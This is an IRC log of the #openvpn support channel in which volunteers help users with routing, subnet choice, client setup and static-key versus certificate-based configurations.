10:00 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 248 seconds]
10:00 < yeshello1here> i'm just making my excuses before i get shouted at :)
10:00 < yeshello1here> ecrist: i could, but it's not so urgent i can't test it later on today
10:00 <@ecrist> it's what we'd do
10:00 < yeshello1here> i can always tell the users to firewall themselves
10:01 < yeshello1here> but it's nicer to do it for them
10:02 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn
10:02 -!- zol_ [~z@del63-4-78-248-82-46.fbx.proxad.net] has quit [Remote host closed the connection]
10:06 -!- soulcito [~soulse@nat/cisco/x-cqtmoghxzixmmfif] has joined #openvpn
10:07 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn
10:09 -!- soulse [~soulse@nat/cisco/x-zkqauoaharydwnac] has quit [Ping timeout: 240 seconds]
10:09 < Tativie> Is there a good watchdog program for when the vpn goes down (debian-gnome)?
10:10 -!- soulse [~soulse@nat/cisco/x-aojgevtxztkmahxk] has joined #openvpn
10:10 -!- soulcito [~soulse@nat/cisco/x-cqtmoghxzixmmfif] has quit [Read error: Connection reset by peer]
10:11 < Tativie> Or perhaps some setting in the config that will prevent connections when the vpn fails?
10:12 <+rob0> !keepalive
10:12 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
10:14 <@dazo> Tativie: two options ... 1) a tiny script which fpings the remote VPN ... and barfs if it can't get contact .... 2) A little log watch framework I wrote (haven't publicly released it yet, but works well) ... http://fedorapeople.org/cgit/dsommers/public_git/logactio.git/
10:14 <@vpnHelper> Title: logactio.git - Simple log file watcher framework which does certain actions when some log events happen (at fedorapeople.org)
10:14 < Tativie> rob0: Do you know how I can specify a .conf file with that setting in it for the gnome shell? Right now it doesn't seem to have any .conf file with the keys or elsewhere.
10:15 <+rob0> that question does not make sense. You create your config files.
10:16 <@dazo> (unless you use NetworkManager .....)
10:16 < Tativie> I have a server config, but don't think I have a client one.
10:16 < Tativie> I know you can have a client one too, but not sure how to set it with debian running gnome
10:17 < Tativie> I could specify it in the command line when I start the openvpn, I know
10:17 < Tativie> but not sure how to set it with the gnome desktop, which is what I would prefer if possible.
10:18 <+rob0> okay, I am not using any kind of GUI frontend, so I can't help with those
10:18 <@dazo> Tativie: You can consider trying gopenvpn ... that uses normal config files ... and gives you a reasonable GUI to start/stop/monitor your tunnels
10:18 <+rob0> you might want to review your distro's openvpn package documentation, which might tell you how to name your files and where to put them
10:19 < Tativie> Both good ideas, thanks :) I'll go do some reading and playing around with gopenvpn.
10:19 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has left #openvpn []
10:21 -!- master_of_master [~master_of@p57B536BC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
10:23 -!- master_of_master [~master_of@p57B55F0A.dip.t-dialin.net] has joined #openvpn
10:24 < yeshello1here> you know i just realised
10:24 < yeshello1here> like 5 meg memory use
10:24 < yeshello1here> for a fairly big VPN server
10:24 < yeshello1here> is hilariously efficient
10:24 -!- dazo is now known as dazo_afk
10:24 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds]
10:50 < fu_fu> I have a TUN server in AWS cloud and clients all over. one client has a LAN that needs to be visible, and a printer that all clients need to print to. Windows OSs. The cloud server has the main need for printing. any ideas?
10:51 <@ecrist> as long as you do the routing properly, the printing should work by IP
10:53 < fu_fu> there is some difficulty with routing that I am having, possibly due to AWS now using 10.8.0.0 subnet for the region, when i push the routes things start to break
10:54 <@ecrist> !1918
10:54 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi
10:54 <@ecrist> try a different range
10:55 < fu_fu> ya, i tried 10.251.0.0 and it works, but I wonder when they will get to that, the 172.0.0.0 are taken in AWS-EU, 192.X are typical for client LANs
10:56 < fu_fu> 172.12.0.0^
10:56 < fu_fu> oops again 172.16.0.0.
10:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 252 seconds]
10:58 < fu_fu> is there a listing of the vpnHelper !_tags?
10:59 <+EugeneKay> !factoids
10:59 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
11:01 < fu_fu> cool thanks
11:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn
11:06 -!- raidz_away is now known as raidz
11:06 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
11:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer]
11:17 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:17 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:17 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:38 -!- soulcito [~soulse@190.222.252.9] has joined #openvpn
11:39 -!- soulse [~soulse@nat/cisco/x-aojgevtxztkmahxk] has quit [Ping timeout: 248 seconds]
11:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:52 -!- soulse [~soulse@190.222.252.9] has joined #openvpn
11:53 -!- soulcito [~soulse@190.222.252.9] has quit [Ping timeout: 276 seconds]
12:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 260 seconds]
12:10 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds]
12:11 -!- wrod [~wrodrigue@triband-mum-120.61.4.231.mtnl.net.in] has joined #openvpn
12:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen]
12:26 -!- wrod [~wrodrigue@triband-mum-120.61.4.231.mtnl.net.in] has left #openvpn ["Leaving"]
12:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:37 -!- soulcito [~soulse@190.222.252.9] has joined #openvpn
12:39 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 260 seconds]
12:40 -!- soulcito [~soulse@190.222.252.9] has quit [Remote host closed the connection]
12:40 -!- soulse [~soulse@nat/cisco/x-xnmnzjlkesaokezq] has joined #openvpn
13:09 -!- brute11k [~brute11k@89.249.235.75] has quit [Quit: Leaving.]
13:19 -!- fu_fu1 [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
13:19 -!- fu_fu1 [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Client Quit]
13:21 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving]
13:24 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Ping timeout: 276 seconds]
13:33 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn
13:45 < yeshello1here> ecrist: you seem to be correct, there was an error in the docs, client-to-client has magically made everything right with the world
13:46 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
13:50 -!- awdjadj [~IceChat77@91.225.135.254] has joined #openvpn
13:50 <@ecrist> right
13:50 <@ecrist> I'll work on changing it
13:57 < yeshello1here> i don't really have the authority to do that
13:57 < yeshello1here> but if i can help, please let me know how
13:58 < yeshello1here> if it involves a lot of reading C, expect procrastination and idleness
13:58 <@ecrist> 13:50:28 <@ecrist> I'll work on changing it
13:59 <@ecrist> I didn't ask/tell you to do it
13:59 < yeshello1here> oh sorry
14:00 < yeshello1here> i've been up for ages
14:00 < yeshello1here> i thought you said "I'd work on changing it" :)
14:00 < yeshello1here> blurry eyes, bad vision, more excuses etc
14:00 < yeshello1here> still that's 2 vpn issues and one ospf issue sorted today
14:01 -!- _0x783czar [~0x783czar@50.117.78.133] has joined #openvpn
14:02 -!- soulse [~soulse@nat/cisco/x-xnmnzjlkesaokezq] has quit [Remote host closed the connection]
14:02 -!- soulse [~soulse@nat/cisco/x-gutqdbxcmbhfdkqw] has joined #openvpn
14:02 * rob0 read "it" in "I'll work on changing it" as "everything [being] right with the world"
14:03 < _0x783czar> Is it possible to manually configure my MacBook to connect to my openvpn account through the System Preferences Networking Pane? in other words, without the Private Tunnel client.
14:04 <@ecrist> _0x783czar: maybe
14:04 <@ecrist> not sure of a way, though
14:04 <+rob0> That sounds like a MacOS question. But indeed, a Mac can run openvpn directly from the shell.
14:05 < _0x783czar> rob0: yeah, I know how to set up a vpn on my Mac, but I don't know what server to point it to.
14:05 < _0x783czar> or what protocol it uses
14:06 <@ecrist> it uses openvpn
14:07 <@ecrist> you need an openvpn client - you can't use any generic VPN protocol
14:07 < _0x783czar> ecrist: oh so openvpn is its own protocol? so not PPTP
14:07 <@ecrist> Tunnelblick is free
14:08 <@ecrist> private tunnel is an OpenVPN Technologies solution - it's written/managed by the same people at corp that help develop openvpn
14:08 < _0x783czar> ecrist: yeah, i'm able to connect using the PrivateTunnel client, but I was just wondering if I could set it up to use OS X's built-in connection manager
14:09 <@ecrist> oh, no, you cannot
14:09 < _0x783czar> ecrist: OK. Oh well, thank you very much for your help
14:14 -!- awdjadj [~IceChat77@91.225.135.254] has quit [Quit: OUCH!!!]
14:15 -!- _0x783czar [~0x783czar@50.117.78.133] has quit [Ping timeout: 255 seconds]
14:27 -!- soulcito [~soulse@nat/cisco/x-fgfiuxlqkvuxaqma] has joined #openvpn
14:31 -!- soulse [~soulse@nat/cisco/x-gutqdbxcmbhfdkqw] has quit [Ping timeout: 265 seconds]
14:32 -!- soulse [~soulse@190.222.252.9] has joined #openvpn
14:34 -!- soulcito [~soulse@nat/cisco/x-fgfiuxlqkvuxaqma] has quit [Ping timeout: 240 seconds]
14:54 -!- dan_ [~dan@c-98-228-62-52.hsd1.il.comcast.net] has joined #openvpn
14:58 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds]
15:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:12 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection]
15:12 -!- soulse [~soulse@nat/cisco/x-wgksrcjowvejcasu] has joined #openvpn
15:20 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
15:20 -!- soulse [~soulse@nat/cisco/x-wgksrcjowvejcasu] has quit [Read error: Connection reset by peer]
15:21 -!- soulse [~soulse@190.222.252.9] has joined #openvpn
15:23 -!- dan_ [~dan@c-98-228-62-52.hsd1.il.comcast.net] has quit [Quit: Leaving]
15:27 -!- bjh4 [~bjh4@ool-18bbdf6b.static.optonline.net] has quit [Ping timeout: 272 seconds]
15:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:40 * EugeneKay sneezes loudly
16:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 240 seconds]
16:08 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn
16:13 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Read error: Operation timed out]
16:18 -!- Kage` [~Kage@198.148.81.187] has left #openvpn ["Derp"]
16:18 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
16:20 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn
16:20 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Read error: Connection reset by peer]
16:25 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 260 seconds]
16:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
16:32 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
16:32 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
16:34 -!- btor [~btor@nor75-19-82-244-49-15.fbx.proxad.net] has joined #openvpn
16:34 < btor> Hi all
16:36 < btor> i have a problem with openvpn, i use a VPN service, which is in a routed mode ( TUN interface ) but when i launch it on my server, my server becomes unreachable. So, do you know the steps to tell openvpn to work on just one interface like eth1 ?
16:38 <+pekster> btor: OpenVPN works just fine when you have a single physical network interface. It sounds like you messed up the configuration, because launching a routed configuration shouldn't do that. Did you not use a unique network range for your VPN?
16:38 < btor> in advance, sorry for my english i'm french ...
16:38 <+rob0> could be a lot of things, really
16:39 < btor> pekster, i use "Hide my ass" service, i don't have access to the server, i just use it as a client
16:40 <+pekster> I'm not your provider, so I can't help you with their service. However, I suspect they're re-routing all traffic through the server, so you can't actually reach your server directly via your ssh or RDP or however you're doing it
16:42 <+pekster> You could probably perform some magic on the client side to add a host-specific route to reach your client IP (the one used by you to contact your remote host) and route that over the pre-existing connection. This is kind of an ugly solution though. Something like 'route YOUR_CLIENT_IP 255.255.255.255 net_gateway' (where you replace your known client IP with the IP you're using)
16:42 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
16:42 <+pekster> That's sort of a bad solution, but there if you want to play with it
16:43 < btor> pekster, yes, that's what i want to do, like using iptables or another way to re-route it
16:43 <+pekster> I just told you how to do that
16:44 < btor> yes, and thanks, but i thought it was possible to specify an interface to openvpn
16:45 <+rob0> it's [probably] not anything openvpn does. It's probably the change to the system route table.
16:45 <+pekster> You don't seem to understand what's going on. Your provider (which I am not affiliated with and can't help you troubleshoot) is pushing the 'redirect-gateway' option, which overrides your default gateway. If you want to override that for a specific Internet host, you need to configure it to do that, such as with the configuration line I just gave you
16:46 < btor> oh ok, i understand
16:48 < btor> thanks a lot people, i'll test it soon
16:55 -!- btor [~btor@nor75-19-82-244-49-15.fbx.proxad.net] has quit [Quit: Quitte]
16:56 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
17:02 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection]
17:02 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has quit [Read error: Connection reset by peer]
17:02 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn
17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds]
17:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 255 seconds]
17:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Remote host closed the connection]
17:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
17:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
17:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
17:13 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn
17:18 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection]
17:19 -!- soulse [~soulse@nat/cisco/x-mrdcozdnjcbyeggf] has joined #openvpn
17:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
17:28 -!- brute11k [~brute11k@89.249.235.75] has joined #openvpn
17:41 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
18:01 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer]
18:04 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving]
18:06 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has quit [Ping timeout: 260 seconds]
18:28 -!- ActionA [~ActionA@2001:470:7:1f6::2] has joined #openvpn
18:29 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer]
18:31 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
18:44 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
18:58 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
19:05 -!- soulse [~soulse@nat/cisco/x-mrdcozdnjcbyeggf] has quit [Read error: Connection reset by peer]
19:05 -!- soulse [~soulse@190.222.252.9] has joined #openvpn
19:20 -!- raidz is now known as raidz_away
19:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:37 -!- ActionA [~ActionA@2001:470:7:1f6::2] has left #openvpn []
19:40 < digilink> hey folks.... question for the experts. I am trying to set up a static key based site to site TUN/routed openvpn setup for simplicity. I have 3 subnets on one side, and just 1 subnet on the other side and want them to be bidirectional. Will IROUTEs work in a static key based setup or will I need to set up PKI instead?
19:45 <+pekster> digilink: iroute is only valid in a ccd or --client-connect context, both of which are exclusive to multi-client (or "server") mode, which implies using PKI. Use of 'route' is used instead in a p2p setup with --secret
19:46 < digilink> thanks pekster, I was afraid that would be the case :( I'm trying to avoid having to NAT the traffic across the VPN
19:46 <+pekster> I don't see how your choice of static keyed versus TLS/X509 makes any difference in that
19:47 < digilink> will I need to NAT my traffic from each LAN regardless? just trying to make everything as transparent as possible
19:47 <+pekster> Not if you configure routing properly at each LAN
19:48 < digilink> so say I add static routes at each lan, that point to the other lan and make the gateway that of the openvpn instance in each, would that be enough to do it?
19:49 <+pekster> Yes, along with firewall rules. FYI, you don't need the OpenVPN peer at either end to be your default gateway (in such a setup the default gateway would need to be made aware of the LAN and route to the VPN peer on that segment)
19:50 < digilink> got it (I think lol) gonna start playing with configs
19:51 <+pekster> You should also make a conscious decision about using static keys because you're giving up perfect forward secrecy in terms of a security benefit that X509 provides
19:52 < digilink> I've been reading on that as well
19:52 <+pekster> Either way can work from a routing perspective for what you're trying to do, so it's purely a security and semantic choice when you just have 2 peers
19:53 <+pekster> Ah, here's the bot's snippet on that:
19:53 <+pekster> !forwardsecurity
19:53 <@vpnHelper> "forwardsecurity" is (#1) in server/client mode with certs your key renegotiates (changes) every hour (by default), so if someone captures your traffic, and then gets your key, they can only decrypt the traffic within the timeframe since last renegotiation or (#2) in ptp mode (static key) you do not have this, so if someone gets your key they can decrypt ANY past traffic that they captured
19:54 < digilink> interesting...
19:54 < digilink> so in other words, use PKI :)
19:54 <+pekster> As far as configuration, the bot links to a handy flowchart for getting client/server LAN access working. Pick one to work on at a time, and remember you wouldn't be using iroute options if you use a static key setup (use a normal route instead.)
19:54 <+pekster> !serverlan
19:54 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
19:55 <+pekster> !clientlan
19:55 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
19:55 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
20:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 256 seconds]
20:18 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
20:18 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn
20:18 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host]
20:18 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn
20:19 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
20:21 < fu_fu> Hi can anybody help? I have a windows setup with client LAN 10.1.2.0/24 server 10.8.0.0/24; i need all clients to be able to connect to the 10.1.2.0 Client connected LAN. I can only get a ping to the actual server NIC 10.1.2.15
20:22 <+pekster> !serverlan
20:22 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
20:24 < fu_fu> nice chart! should this do the task? route 10.1.2.0 255.255.255.0
20:24 < fu_fu> push "route 10.1.2.0 255.255.255.0"
20:25 < fu_fu> so the client needs a route back to the server? the thing is that i have a printer at 10.1.2.26 that needs to be avail, the printer is default route to 10.1.2.15
20:25 < DBordello> great chart, that problem frustrated me for hours yesterday
20:25 < DBordello> fu_fu, consider a TAP tunnel?
20:26 <+pekster> You don't want tap for that...
20:26 < DBordello> pekster, why?
20:26 <+pekster> Printers do not require Ethernet frames to function
20:26 <+pekster> !tunortap
20:26 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
20:26 <@vpnHelper> over the vpn or (#4) lan gaming? use tap!
20:27 <+pekster> fu_fu: Follow the flowchart. You need to set up the route to the VPN on the default gateway for the LAN (this will be done for you if the VPN server is also the LAN's default gateway.)
20:27 < DBordello> What is nathack?
20:27 <+pekster> source NAT between 2 LANs is ugly and breaks bi-directional connectivity
20:28 < DBordello> figures
20:28 <+pekster> The only reason you'd ever need to do that is if you don't control the gateway in your environment
20:28 <+pekster> Actually, NAT in general is ugly
20:28 < DBordello> the reason I used TAP was since I don't have a gateway on the LAN
20:29 <+pekster> That makes no sense. Not having a gateway to the rest of the Internet would mean you don't need a VPN to start with
20:29 < fu_fu> the client is the one with the LAN that needs to be accessed, i could just switch it around client for server, but I rather not.
20:29 <+pekster> fu_fu: Oh, the LAN is on the client?
20:29 <+pekster> k
20:29 <+pekster> !clientlan
20:30 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
20:30 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
20:30 < fu_fu> ipforwarding is enabled and tests : YES
20:30 <+pekster> Sorry, I mis-read that and your question was properly phrased from the start :(
20:30 < DBordello> pekster, it is an internal management lan. I am accessing it through a dual-homed server, that is where the VPN comes in
20:31 <+pekster> DBordello: Ah, gotcha. I tend to prefer SNAT for stuff like that, but whatever works for you
20:31 <+pekster> Or just route your "special VPN users" to the LAN and drop a gateway there allowing only access to those users
20:32 <+pekster> A default gateway on a management backend is fine as long as you have strict access controls to reach it
20:32 < fu_fu> in the diagram, last section, says do you have access to the router? does this mean the default router of the client machine?
20:32 < DBordello> I decided to play it safe, no gateway needed. It is mostly IPMI etc type devices. They have a tendency to forget their gateway anyways
20:32 <+pekster> fu_fu: Yes. The systems on your client LAN need to form a reply packet, and it needs to go back over the same path it took to get there
20:33 <+pekster> DBordello: Sure. I'm not saying it's always bad, but it's "often" the wrong decision to completely lock off a LAN, and then just hack around the security in the end anyway ;)
20:34 < fu_fu> ok, so do i route to the LAN interface of the client, 10.1.2.15 or to the tunnel?
20:34 < DBordello> pekster, probably true ;)
20:34 <+pekster> fu_fu: Gateways are always on your local network
20:35 <+pekster> Add a return route for the VPN network range routed through the VPN client's local IP with respect to the client-side LAN
20:35 < fu_fu> cool, i will try it now
20:36 < DBordello> On the return path, would it go PC -> Gateway -> VPN PC?
20:36 < DBordello> Well
20:36 < DBordello> PC -> Gateway -> VPN PC === VPN ===> Client
20:37 < DBordello> The fact that those first two links are in the same physical segment doesn't cause problems?
20:38 <+pekster> Nope. That's how routing works
20:39 <+pekster> A gateway just looks up the OSI L2 address of a system to send a packet based on its L3 destination
20:39 < DBordello> interesting
20:39 < DBordello> i guess it doesn't care what L2 segment it is on
20:40 <+pekster> Sure it does; you can't send an Ethernet frame to something that's not on your LAN ;)
20:40 <+pekster> Say my network is 192.168.50.0/24; I can't just magically route to a network via 10.20.30.6, because I can't directly reach that system by Ethernet
20:41 <+pekster> You might get some learning material out of a link like this:
20:41 <+pekster> !tcpip
20:41 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
20:42 < fu_fu> you dudes rock!
20:51 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer]
20:53 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
20:54 < fu_fu> ok so the client-side LAN router can get to the VPN tunnel and to the other side to the VPN server, even to clients on the other end of the vpn. VPNserver still can not ping the printer
20:55 < fu_fu> vpnserver->TUN>Client>printer
20:55 < fu_fu> i get the learn message in the daemon when I try to ping so i guess it is not getting back correctly
20:56 <+pekster> Where in the flowchart are you getting stuck?
20:58 <+pekster> It could be a firewall issue too; are your firewall rules permissive of the reply traffic on your VPN server?
20:58 < fu_fu> i just added the route to the router, and it works fine, can get to clients over the vpn even past the server
21:00 < fu_fu> ok, i can not ping the clientside router from the server
21:00 < fu_fu> so is the route problem on the server side, or still maybe a fw block
21:01 <+pekster> You need to start at the very top of the flowchart instead of jumping around from the top all the way to the bottom
21:06 < fu_fu> I will check again, but I think I did. "can you ping another machine in the LAN? NO, access to router, YES, route added router can ping to 10.8.0.1(tunnel side of server)"
21:10 <+pekster> Okay, so from the VPN server you can ping the IP of a system on the client LAN that's not the VPN client system?
21:11 < fu_fu> no
21:11 <+pekster> So, you likely have a firewall issue at your client-LAN default gateway. You could test this by taking another LAN client and adding a manual route to the VPN network via the VPN client's LAN IP
21:11 <+pekster> If that works, you need to fix your firewall (or routing) on the client-side LAN gateway
21:11 <+pekster> If it doesn't, you'll need to post VPN config files because something else would be wrong
21:14 < fu_fu> ok, ya, i see i may need to add an access list for the ping to the VPN network
21:14 < fu_fu> would that give this type of issue?
21:38 <+pekster> It could, yes. A firewall at any path the packet takes is able to deny the traffic if so configured
21:43 < fu_fu> pekster, thank you for going through this with me.
21:47 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
21:47 <@ecrist> sup folks?
21:48 < fu_fu> Hi, ecrist
22:00 -!- brute11k [~brute11k@89.249.235.75] has quit [Quit: Leaving.]
22:22 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn
22:22 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host]
22:22 -!- ben1066_ [~quassel@unaffiliated/ben1066] has joined #openvpn
22:22 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
22:22 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
22:22 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
22:22 -!- mode/#openvpn [+o krzee] by ChanServ
22:22 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Ping timeout: 260 seconds]
22:45 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.]
23:25 -!- soulse [~soulse@190.222.252.9] has left #openvpn ["Leaving..."]
--- Day changed Tue Jan 08 2013
00:13 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
00:13 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
00:14 -!- Netsplit *.net <-> *.split quits: WinstonSmith, jgeboski, jave
00:15 -!- jgeboski- is now known as jgeboski
00:16 -!- Netsplit over, joins: WinstonSmith
00:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
00:24 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
00:43 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
00:54 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn
01:24 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
01:39 -!- Devastator- [~devas@177.18.197.67] has joined #openvpn
01:41 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds]
01:55 -!- csaba [~csaba@195.199.154.25] has joined #openvpn
01:56 < csaba> hi
01:56 < csaba> would like to ask for some help
01:57 < csaba> I have a firewall with openvpn on it, it is ipcop
01:58 < csaba> and soon I will have to replace the machine. The question is can I keep the existing openvpn keys on it once I move to new hardware?
01:58 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 246 seconds]
